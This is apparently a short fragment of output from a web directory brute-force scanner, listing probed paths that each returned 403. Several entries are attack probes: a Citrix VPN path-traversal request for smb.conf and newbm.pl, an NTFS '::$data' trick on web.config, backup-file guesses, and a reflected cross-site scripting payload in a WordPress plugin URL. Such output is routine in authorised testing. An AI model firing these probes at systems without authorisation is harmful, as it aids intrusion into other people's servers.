/vpn/../vpns/cfg/smb.conf (Status: 403) [Size: 15264]
/vpn/../vpns/portal/scripts/newbm.pl (Status: 403) [Size: 15657]
/web.bak              (Status: 403) [Size: 15146]
/web.config.temp      (Status: 403) [Size: 15220]
/web.config.tmp       (Status: 403) [Size: 15195]
/web.config::$data    (Status: 403) [Size: 15230]
/webalizer.old        (Status: 403) [Size: 15214]
/wp.old               (Status: 403) [Size: 15139]
/wpdmpro/list-packages/?orderby=title%22%3e%3cscript%3ealert(1)%3c/script%3e&order=asc (Status: 403) [Size: 15706]
/~.bak                (Status: 403) [Size: 15136]
